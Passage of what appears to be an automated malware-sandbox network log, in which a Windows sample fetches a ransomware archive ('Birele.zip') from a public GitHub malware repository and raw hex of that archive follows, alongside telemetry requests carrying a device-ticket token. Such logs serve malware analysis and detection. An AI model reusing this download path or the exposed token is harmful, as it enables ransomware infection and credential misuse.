                                                                                                                                                    2022-09-29 13:00:19 UTC38759INData Raw: be 87 49 ef b4 ac 86 6d 69 50 97 71 49 d1 bb 8b 12 7e 16 3d 3b 51 c7 6a 1b ab 2f 36 bb 74 2f 76 3b b2 74 c1 3b af 1e e9 da 1f ca f4 c9 0a ae 46 1d 48 dc f7 89 6e fe 47 e1 dd 6d 8c bf cb 33 92 90 cd 24 e6 8c b8 99 43 f3 62 07 27 21 c4 b6 72 ca a2 a3 1a 7c 91 46 b6 23 94 3d 1e 48 57 87 bb 89 67 48 3d 1e 0a ce 2e 38 48 00 62 e9 3c 98 f9 dc 04 04 dd 54 9c 7c a1 9b 63 8f 17 bf 31 15 9d 34 41 5e 2d 2b bb 02 93 18 05 63 13 e4 c7 61 62 31 7e ea 08 46 ba 6a 74 e2 1c a0 7a 2d 4d ea d9 28 fa 72 09 a2 ec df d3 e6 5e 52 33 da e6 c9 69 52 31 93 2a 37 0f a9 5e 62 a3 3b 95 8a 13 e7 20 bd ef c6 04 fb 83 d0 f4 43 b2 44 5d 81 5d b7 78 c5 67 25 b1 9d 62 3b ce ab 37 aa 92 a3 41 f6 10 5e 17 bf 43 de 59 98 6d 7c d1 a3 32 12 25 6e 1d 70 eb 88 3b 05 d7 ad e7 d5 88 ab 4d 6d ae 31
                                                                                                                                                    Data Ascii: ImiPqI~=;Qj/6t/v;t;FHnGm3$Cb'!r|F#=HWgH=.8Hb<T|c14A^-+cab1~Fjtz-M(r^R3iR1*7^b; CD]]xg%b;7A^CYm|2%np;Mm1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    152192.168.2.349827104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:20 UTC38775OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: MSDW
                                                                                                                                                    MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAQyg68hNd+pS9Cokwe9Vycw1xUmHLVSWEzL3ILk4ELKDB0EcA/Y5BMquB/Vr4wAzUg5izvEikn5Ygt0TdscvgTm/QeZEM03mTZb3cKyj6JF1AwIm0XjNFKOEJ2wiwyfJL3u7TQr3sGIFa48jJehodEV4DgGnOT77rplQNF9nix+Q67MOQO6E+nA91CE/gq12KW+C9IQOkWidi/EdkAgDryv6RYqXkuZmfl7p0kuXn6c8t2nK8sCAsMLbv7BXw4x2MOoR8EO97cdJHi/VZzqzuClMiFxYHJtSRtliL372+qEBnsU+EnPOOrL/z/ZiHPENFKIkRPbb/8l6KkMvLzfeI2cDZgAACNOqKCTKkDaTiAEAiCbHfOZdk37ebs4z9YlWK0ggABm5rlJR8mqKoukm5s59WGiTEsqaTsEqSuTQyAMtNdco9DDEAvt4+UMabUuNVDEWqzFfrHVrSdvQYjsDapDi7Pbjmu7yRtHNbrcghaauEFGvYmKB1OojJfqVlDlWn/kqifa1Q4NFlFw6WHgVAEgJlDC8ClLbpH9UlTeh3+xKs97H8FWS5YOaaMhWsjgMoBKupsWUsYgnaK0nOm640mhdaqhVns4fhXbe15xBWB1dmuDf692q8AqeBxx7Gj3D2e5z4hCLVGBWOzS+dlAggdr7HR/xo6TZoa1w0Uy+ha3Kc7+iHfFWH8U1SdI3ZiUzpvWZRT9p9Le/WWEhKvVrrHDYHWsUyVV94CvHzB2L6bfeAfFQJQE5yXQCxMvx6MbguJX2Yp84PBovQJfaNqSXR32KdTi12J/iQd2uTgVk0y6lvTSKrxN08DBFWr9qfPWF7wM89QXseKP8nHDXjPEjgimbyp8FAH0QrqADB29FmuasrPKg//o80bgB&p=
                                                                                                                                                    Content-Length: 4664
                                                                                                                                                    Host: watson.telemetry.microsoft.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    153192.168.2.349833104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:25 UTC38776OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: MSDW
                                                                                                                                                    MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAQyg68hNd+pS9Cokwe9Vycw1xUmHLVSWEzL3ILk4ELKDB0EcA/Y5BMquB/Vr4wAzUg5izvEikn5Ygt0TdscvgTm/QeZEM03mTZb3cKyj6JF1AwIm0XjNFKOEJ2wiwyfJL3u7TQr3sGIFa48jJehodEV4DgGnOT77rplQNF9nix+Q67MOQO6E+nA91CE/gq12KW+C9IQOkWidi/EdkAgDryv6RYqXkuZmfl7p0kuXn6c8t2nK8sCAsMLbv7BXw4x2MOoR8EO97cdJHi/VZzqzuClMiFxYHJtSRtliL372+qEBnsU+EnPOOrL/z/ZiHPENFKIkRPbb/8l6KkMvLzfeI2cDZgAACNOqKCTKkDaTiAEAiCbHfOZdk37ebs4z9YlWK0ggABm5rlJR8mqKoukm5s59WGiTEsqaTsEqSuTQyAMtNdco9DDEAvt4+UMabUuNVDEWqzFfrHVrSdvQYjsDapDi7Pbjmu7yRtHNbrcghaauEFGvYmKB1OojJfqVlDlWn/kqifa1Q4NFlFw6WHgVAEgJlDC8ClLbpH9UlTeh3+xKs97H8FWS5YOaaMhWsjgMoBKupsWUsYgnaK0nOm640mhdaqhVns4fhXbe15xBWB1dmuDf692q8AqeBxx7Gj3D2e5z4hCLVGBWOzS+dlAggdr7HR/xo6TZoa1w0Uy+ha3Kc7+iHfFWH8U1SdI3ZiUzpvWZRT9p9Le/WWEhKvVrrHDYHWsUyVV94CvHzB2L6bfeAfFQJQE5yXQCxMvx6MbguJX2Yp84PBovQJfaNqSXR32KdTi12J/iQd2uTgVk0y6lvTSKrxN08DBFWr9qfPWF7wM89QXseKP8nHDXjPEjgimbyp8FAH0QrqADB29FmuasrPKg//o80bgB&p=
                                                                                                                                                    Content-Length: 4626
                                                                                                                                                    Host: watson.telemetry.microsoft.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    154192.168.2.349864140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:59 UTC38777OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    155140.82.121.4443192.168.2.349864C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:59 UTC38777INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:59 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 13:00:59 UTC38778INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    156192.168.2.349865185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:59 UTC38779OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    157185.199.108.133443192.168.2.349865C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:59 UTC38779INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 116134
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:59 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6964-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456460.803674,VS0,VE172
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 2edde9cd7ea4145a85c3eece1c8be2282b4dca27
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:05:59 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 13:00:59 UTC38780INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                    Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                    2022-09-29 13:00:59 UTC38782INData Raw: 8a f5 7c 29 39 16 89 76 c1 a8 b3 1b f0 ef c9 78 a0 8b f8 2f 0e f5 bc e8 c7 0e 5c 35 e1 40 e5 1a a3 c3 53 a1 36 11 3b 2f 25 b5 ef 8f d7 97 89 98 bb e4 eb 9a a6 35 a2 4a 6c eb c9 37 fa 9a ae 7b e5 5c a5 51 a5 d7 58 98 ee 57 4c 6d 06 c0 ec 8c b0 1f 06 85 dc c3 98 82 bc b9 be 0d 30 b8 4b a2 ae 0c 08 19 f3 d3 16 56 c4 87 92 5b 25 12 36 61 be ee 29 11 14 92 10 ba 7e cc 2d 28 bf 0f 8d c5 9f c4 46 dd cb 6a 4f 9d a0 fe ef 2b ca 6b e5 ee 2a 5a 1a 0a 15 85 78 d8 62 0c 3b ba 6f 42 d2 7b e6 1f 39 69 40 5c 35 1c d6 18 4f 2e 5f 56 f5 de be fe b6 81 4d f3 c4 84 09 5f e7 8b e0 28 ea 1c c8 69 a0 33 1b 65 e5 03 1e 6e af ec 02 6c f0 23 42 89 f9 85 a1 a2 88 55 cb a4 af 47 98 f7 32 57 d0 75 55 e8 58 37 6b aa 95 a8 b4 f2 d4 fa 98 58 07 4c 42 4a 70 9f d2 ea c8 57 37 9b 85 c0 d5
                                                                                                                                                    Data Ascii: |)9vx/\5@S6;/%5Jl7{\QXWLm0KV[%6a)~-(FjO+k*Zxb;oB{9i@\5O._VM_(i3enl#BUG2WuUX7kXLBJpW7
                                                                                                                                                    2022-09-29 13:00:59 UTC38783INData Raw: c2 6c 59 a4 7e 06 df a3 8c af f5 74 f5 8f 18 d2 5e ee ef 7a d5 71 23 9c ba cf 2e 45 f2 c0 1e 54 12 c6 72 02 6f 6d c5 16 cd ee d2 f3 e4 6f 24 c2 8c 09 8b 53 60 59 c9 2d d0 f8 2e 39 8b b6 8a 24 19 77 17 e7 e2 18 0a 74 2c 90 9d 07 13 f7 3c bf 95 4e 11 de b3 2b 18 f4 14 95 06 b1 6a ec 6f 27 19 3a f8 3d 36 4b 41 b5 2a e4 bb 59 a8 f3 23 fe 7c 16 ff 63 1e c7 3a a4 9c d4 e4 a1 9f 18 e8 3f 9e dd 9e 50 19 38 a5 06 d3 2a 0d 8f 93 ab b4 83 ad a4 1c fb 28 ca c5 8d 26 80 83 a7 b8 dd 6e 85 c7 00 3a 3d a0 0a 5f 54 03 e8 92 25 c6 67 40 eb a2 15 c8 56 d7 de 6b e8 9b 87 2a 95 a9 37 de fe 65 26 f8 85 20 82 76 72 0b 80 bb ad fe ce cb d4 c8 f8 e5 89 19 44 c1 5f 11 36 8d 6a 7e 95 aa a4 c5 ec 20 3c fc 85 77 1c 7e c2 60 3f 39 d8 55 2a 12 e9 cb 2f e4 35 0a 5b 53 69 cf 28 36 23 4c
                                                                                                                                                    Data Ascii: lY~t^zq#.ETromo$S`Y-.9$wt,<N+jo':=6KA*Y#|c:?P8*(&n:=_T%g@Vk*7e& vrD_6j~ <w~`?9U*/5[Si(6#L
                                                                                                                                                    2022-09-29 13:00:59 UTC38784INData Raw: c7 90 79 b8 d8 da 89 03 65 0c eb 36 fb f9 de a7 f2 ed 71 e0 30 ab 13 69 70 eb 3d f3 9f b1 f6 07 79 60 ff 38 4f c4 e8 6f 16 71 73 bf 5a 78 22 bd b8 d6 7e 3a e1 1a 9b 08 2e 91 3e 14 08 49 ad c8 78 d0 99 89 4b 1c 05 cb 75 b8 29 93 15 78 77 1b d6 d3 d1 5b 33 26 ee 03 b7 07 4c dc a9 fc 3f 3b 61 b9 94 27 fe 45 4c ab 5a fc b4 bd cc 75 e1 4b 07 37 2a 6f 42 90 14 88 c9 78 c7 02 ce 68 4f 35 0c fe 34 16 a7 c4 35 f2 d5 1b c6 21 49 90 8f 8b 81 12 d5 27 6f b1 d6 9e 24 e2 b1 2b ab c4 4f 91 d6 c3 c0 62 34 e5 ed 6a 5f 0c a0 07 48 a9 70 b2 fb 84 2a 99 06 3b 18 62 ed 46 3a b7 78 78 93 a9 95 3f a1 13 04 78 37 6e 51 42 fd 58 cb db 80 f7 31 ad 66 71 fd ed 0e 71 6f 00 4c 90 d5 e2 a5 7b 77 4f 74 29 27 3e 4b 04 a3 7d 94 8b ed 3d fb b8 db 4c 3b 9e 71 8c c3 a2 0d f3 e8 02 3e 72 6b
                                                                                                                                                    Data Ascii: ye6q0ip=y`8OoqsZx"~:.>IxKu)xw[3&L?;a'ELZuK7*oBxhO545!I'o$+Ob4j_Hp*;bF:xx?x7nQBX1fqqoL{wOt)'>K}=L;q>rk
                                                                                                                                                    2022-09-29 13:00:59 UTC38786INData Raw: dc 8e f3 15 82 7e 8b 36 8a 14 ca aa 8e 41 6c 35 9d 0d d3 9b 72 ce e0 af e2 32 1a d7 47 be a6 d2 87 8f fd bc 29 f9 25 8f 2b bf 7a ee 5f f5 d6 16 09 36 21 1d 1b 20 b9 48 44 06 96 07 64 89 2c 15 be 27 3d 6a f7 46 c9 18 87 f7 db 4f c4 72 15 b0 15 cf ae 94 fa 95 34 c9 d2 af f8 1d 30 b0 e5 d3 d8 2a ff 9c 8d 3f 39 cf f3 5f 61 1f 60 0d 94 59 52 c3 b7 18 c5 fb e5 f4 9c ec 79 d2 f7 3b d6 37 f6 3f 7e 97 88 a1 9b c6 f1 73 53 8c 59 89 1d 2b 0d 20 64 61 48 a8 13 85 8c fe 49 72 f6 c0 51 b4 6c 39 7c 99 bd e1 1a 0f e0 7b e2 38 ca 65 91 1c e2 b9 cf 36 36 94 47 96 20 7a 2f 86 a5 36 c3 58 f6 91 74 7f a6 67 ac 94 d3 8e cd 1c a1 d0 da 4d ce fd 8a c0 1f e7 50 64 89 35 a3 74 c8 5e 96 6f 66 fa 7e b5 ff 05 48 57 e8 b2 8e 94 aa 1b 0d 23 fd 07 ea e4 81 c3 1a 8e 1e 56 37 34 ce 99 87
                                                                                                                                                    Data Ascii: ~6Al5r2G)%+z_6! HDd,'=jFOr40*?9_a`YRy;7?~sSY+ daHIrQl9|{8e66G z/6XtgMPd5t^of~HW#V74
                                                                                                                                                    2022-09-29 13:00:59 UTC38787INData Raw: 2d ca 24 f5 9c ba 58 c3 29 90 e0 47 6d 3b 4b 82 41 4c cd 3b 56 f0 d8 db 67 39 12 4d f3 e6 91 38 88 ae ce 0b 13 d1 50 ee 3d 34 b5 02 56 8b 0b 95 40 66 08 1a f3 27 9e 8a 88 26 af 84 c6 48 3f 27 d8 3c ff d4 b6 3d a4 96 bc d2 88 65 b6 ec 50 8d 36 b5 1b c6 ec 8a f0 5f d9 c7 77 21 78 f0 fd 9d 5d 02 d7 3f 71 21 da 7b e0 2a a6 b1 2f ed f7 87 c1 67 b2 55 9f 50 f2 93 8c d9 13 02 7b 84 a5 33 39 64 40 10 e2 dc ed ca 41 32 de e9 57 8b 47 ee 68 5b 78 d5 ef 8d 3e a5 c4 ed a5 04 0a 43 bf 54 b0 27 e6 dc fb 16 e3 7d aa 40 a6 8e 8a 07 41 9d 04 4e 1c 90 2f 33 a7 03 91 f4 79 ac 33 60 16 2f 36 6e 6d 26 e1 e6 d0 70 da d0 86 bd 47 9b 27 41 5c ee 80 e3 fb 37 ea 46 41 4e 52 bb 0c db 8b 84 a9 6d 1b 5e 23 47 5f 35 36 1a 66 8b 69 ae 2c cb 4c 55 80 97 de ad 9b bc 26 88 7e 39 d3 08 8c
                                                                                                                                                    Data Ascii: -$X)Gm;KAL;Vg9M8P=4V@f'&H?'<=eP6_w!x]?q!{*/gUP{39d@A2WGh[x>CT'}@AN/3y3`/6nm&pG'A\7FANRm^#G_56fi,LU&~9
                                                                                                                                                    2022-09-29 13:00:59 UTC38788INData Raw: 85 af 37 94 7b c6 f5 45 db 21 f7 74 2f 62 98 10 2c d3 f0 06 42 b9 d3 2b c7 24 9d ff 0a a3 22 27 c4 9b 56 ee c9 5d 9f eb 18 6b cc 6d 3b 94 27 fc df 30 73 39 f8 9f 49 cb ba 13 34 65 b1 cb f7 50 97 73 02 e5 cc f8 16 29 f9 fd ba d3 f5 38 37 09 01 af fd d9 97 ae 3b 51 ec 53 25 57 bd 7e bc ba d7 c6 4e e4 2e e2 ab de e6 6f 6f 9c 43 f9 5a 6d 9c af 76 15 02 59 43 56 55 01 1e 24 cb 77 24 de a4 e0 48 e0 9c 0c c7 7e d7 6d fc 2d ec 24 4b 8e c3 03 d5 27 75 da d8 cd f8 4f 8b 1c df fe 8b 7d d7 20 f1 50 e6 a5 0b 7a c8 6e e6 c7 b5 98 29 24 89 d4 76 15 84 d3 bf a3 16 63 62 4b ed 80 0f 3f 1d 4a fb 21 b0 04 e0 fc 51 9e df b8 2a eb 13 bb ef bb c2 dc f1 7e 0a 09 1f 3e 8d 0a 5e 33 d8 1b f5 78 da 6a 8e 5a 4d 40 d5 0f 11 5d b9 27 16 4b 0b 75 8e 11 1f 7c 39 82 d0 65 f2 b0 9c b9 f9
                                                                                                                                                    Data Ascii: 7{E!t/b,B+$"'V]km;'0s9I4ePs)87;QS%W~N.ooCZmvYCVU$w$H~m-$K'uO} Pzn)$vcbK?J!Q*~>^3xjZM@]'Ku|9e
                                                                                                                                                    2022-09-29 13:00:59 UTC38790INData Raw: c6 2f 88 a8 1b d7 b6 59 34 af 0e 54 ff cb 92 25 2a e6 68 38 27 80 7b 48 b0 f5 b9 ce ac cb 1d 2a fd a0 8c 20 1b bc 1b f2 03 c7 99 06 8e 9e d9 b8 30 db b3 53 44 a0 e4 0b a2 c3 0d d6 85 47 fa e0 7c 66 45 ac 83 c2 8b f1 93 08 12 40 95 8f ab ce e4 2e 4e c8 3f 7b c1 64 02 75 0e a0 89 28 4b 5f a7 1f 1a 17 92 89 61 94 69 0f 14 5f 0b f0 33 e1 16 bd 9e 23 9a 33 67 d5 1e db 6f e2 77 ac 55 ca 94 90 61 05 5c 7d 4f 3b 4e b8 91 26 6f db 5c 09 1e ca 72 cf 52 0b be 6f 6c 8a 3a ea e7 b5 0b 07 46 49 e4 fb a1 b9 49 59 92 a8 6d 40 a1 a5 7b bf 8e fe 50 8b 2c 00 06 90 6d 23 f7 51 ba a4 a5 ee 5d 52 b5 fc 8a ab 56 2f e7 e3 fc 29 0e 2f e2 70 82 ce 4b e9 f3 f5 7b eb 3b 40 af a6 69 1f 0b 01 be 84 89 56 7b 6e 23 61 a8 3a 74 69 90 7b 27 d9 8e 66 d1 6b e5 cf 9c 49 de 22 0f a8 54 6f ef
                                                                                                                                                    Data Ascii: /Y4T%*h8'{H* 0SDG|fE@.N?{du(K_ai_3#3gowUa\}O;N&o\rRol:FIIYm@{P,m#Q]RV/)/pK{;@iV{n#a:ti{'fkI"To
                                                                                                                                                    2022-09-29 13:00:59 UTC38791INData Raw: 32 b1 6c 7c 05 84 57 c8 2c c7 2f 11 e6 09 07 62 fd b1 78 16 7e 07 2b 0d 19 cc eb 17 3e d0 eb 2e a6 19 7a 4a d4 63 34 33 9b 1f 1d c9 f0 7c f4 65 14 fd 1d af f3 5e 2b 84 20 49 bf 14 10 36 f9 94 ea de 28 e1 e6 c1 24 b1 52 0b 8b 10 f8 cb 56 c9 84 ae 54 14 4b 80 cc b3 40 9e c0 b1 98 42 dd af 1d 20 ab 14 96 8a c9 54 a0 90 5f 30 23 ec 68 b6 9b e5 d1 5b d5 cc 4b eb 3c db 98 19 e5 6f 2f 70 a9 c7 9b 0c ad cb 22 1a 07 0c 38 5a 29 e0 d8 0a 9d db 9a 33 81 04 9b ff 95 dd 26 ee b9 c3 d1 ee a3 06 f5 e4 5a 80 5e 50 19 a3 7d 56 17 60 6a f8 0e cb 4f 74 37 1e 0c 6c 4a b1 ea d2 4e a7 51 ec 8d 8e d5 f5 98 f5 3e 0f f5 2b fb b2 44 aa d2 ef 6a 7a 23 ba 62 50 5b 27 81 88 7c 91 11 71 36 01 33 61 d4 96 e6 fa d2 46 9b e0 f6 e4 ce 5b 21 39 b3 56 b7 be 8b a4 00 44 be b8 7a 94 67 2b e0
                                                                                                                                                    Data Ascii: 2l|W,/bx~+>.zJc43|e^+ I6($RVTK@B T_0#h[K<o/p"8Z)3&Z^P}V`jOt7lJNQ>+Djz#bP['|q63aF[!9VDzg+
                                                                                                                                                    2022-09-29 13:00:59 UTC38792INData Raw: 31 c5 14 a1 df 68 f3 a8 20 e3 c5 b4 58 ba 54 57 49 8e db c3 36 b2 f7 74 f1 f8 c3 78 89 12 a5 8f ab 92 61 6a 62 a6 33 7a 20 4a e4 d7 39 2c 1f a8 f3 a7 4d d5 0f 26 21 8a 0a 73 4f 8e 20 56 68 a0 9d d5 8c 79 39 b4 4c 47 81 90 cc 6f e0 5f e1 63 e3 5f 10 f7 ee 8a 3d 8d 14 e0 3f af 46 e7 9b bc d8 a7 25 98 a4 7c a6 bb 11 af 6a e3 80 cf 9b 2d b2 e4 90 fd 45 66 4c fe 80 b8 27 b2 07 07 7b 99 69 8f f2 c6 4f 0e 2d 03 51 15 d4 7e 1f 14 74 45 cd 53 a6 6d c7 f3 2a 2b c2 2d 01 81 05 08 b2 54 b0 87 e2 74 43 39 32 57 04 b3 81 c4 b7 7b 77 d6 d7 f5 c3 43 00 4f 49 a0 cb 4b 9c 2b c2 d9 56 02 38 31 b8 b9 f2 ea a1 9a c0 ce c3 cc 75 a4 c4 ab e7 92 76 7d 1c b2 23 c2 f3 75 96 8d c0 24 52 8a 5f a6 42 59 8a 94 89 ec 01 4e c9 ac 72 de 43 85 22 db b2 ee 4b e1 b5 a3 31 5a 6b 2a ab ff 85
                                                                                                                                                    Data Ascii: 1h XTWI6txajb3z J9,M&!sO Vhy9LGo_c_=?F%|j-EfL'{iO-Q~tESm*+-TtC92W{wCOIK+V81uv}#u$R_BYNrC"K1Zk*
                                                                                                                                                    2022-09-29 13:00:59 UTC38794INData Raw: bf c3 4c cc f3 48 a1 f1 37 d0 a5 1b bf 67 33 3f 75 bd 10 d0 df 9d df 59 4c 1a 53 35 51 a1 69 ca 07 cc 5c e4 89 8c 25 6e fd c5 a8 3f 23 f1 f8 05 24 25 9d f6 0c a0 33 dc df ef 13 9b 51 cd 61 95 b7 8f 15 32 af 9b f4 a4 de b4 4c 9d d3 11 7a 04 48 63 81 81 a4 d5 0e b3 e6 f9 8a b9 a0 83 55 0d 51 a0 0f c6 cb 99 41 57 9c 01 6e 08 0a 8f 72 56 60 89 1e 3b 80 ed a5 c7 1b 53 82 bb c6 59 5b 4e 3c e7 07 ba 30 46 90 4b c3 9f 52 05 6c 7a a6 06 3b 6f 9d d2 ab 5b 89 26 4e 52 02 80 e6 32 c9 2a ae c9 30 5b fb a2 5d d5 79 87 ec b3 40 0a b3 3a f0 27 62 4a 5c 57 1d 5f 1b 4f 20 82 50 0e 87 59 b6 a6 2d b1 da 89 dd f0 a9 a4 3e 00 d8 0a 3e ee 3a 9e 0f a3 6c 69 89 fe dd 3b 98 b9 d0 dc 45 b7 53 ac 78 9f e1 e6 6c a1 a7 e8 45 23 0c 9f a9 81 ba 7f 70 23 e1 ac f1 a0 08 bd 47 7f 5e 2f f9
                                                                                                                                                    Data Ascii: LH7g3?uYLS5Qi\%n?#$%3Qa2LzHcUQAWnrV`;SY[N<0FKRlz;o[&NR2*0[]y@:'bJ\W_O PY->>:li;ESxlE#p#G^/
                                                                                                                                                    2022-09-29 13:00:59 UTC38795INData Raw: 3a 7d 7f b8 ac 6a 77 3e 70 4b 17 88 5b f2 ca 0d b1 32 ae 01 76 af 8d e9 cf de 6f be 1b b6 cb bb ac 98 41 c9 b3 c2 1a ac 33 a2 dc 94 f4 38 d2 37 7f a3 c0 88 9a bb e1 3c 6e 86 33 f9 fa 4c 7c 24 ae 50 0b 11 1b 65 f0 61 28 8c e3 8d af 67 de f2 ec 0c 2d a3 2e a8 d5 41 f7 0a d3 13 66 da 0c 99 fa b5 4d 77 4d 59 f4 79 fd 58 87 dc 71 ad 2e 76 7a 58 cb 0f 1f c1 e8 4d 7d 1a d0 f6 a4 49 97 96 12 6f 43 8b e4 e3 d4 86 6d 86 cc d5 0f ea f2 b0 d3 c6 40 6e 75 72 e8 25 70 4b b7 5b c6 ed 59 32 27 b8 2b a1 f1 17 29 63 0f d1 5f bc 32 44 e4 d4 50 a6 8b 35 74 ff 15 ae a5 ae 75 48 bd 30 0b 24 70 e3 07 9c 7f d1 d2 68 ab dd c2 8e d5 78 7b 55 80 83 4f f6 cf f6 22 a8 7e a1 4a 86 2b b3 05 97 90 53 20 41 e1 cc 34 6f d9 18 7f f7 20 fb 5d 33 b3 dd 9b 15 77 77 ab 91 92 6c c9 45 69 86 5e
                                                                                                                                                    Data Ascii: :}jw>pK[2voA387<n3L|$Pea(g-.AfMwMYyXq.vzXM}IoCm@nur%pK[Y2'+)c_2DP5tuH0$phx{UO"~J+S A4o ]3wwlEi^
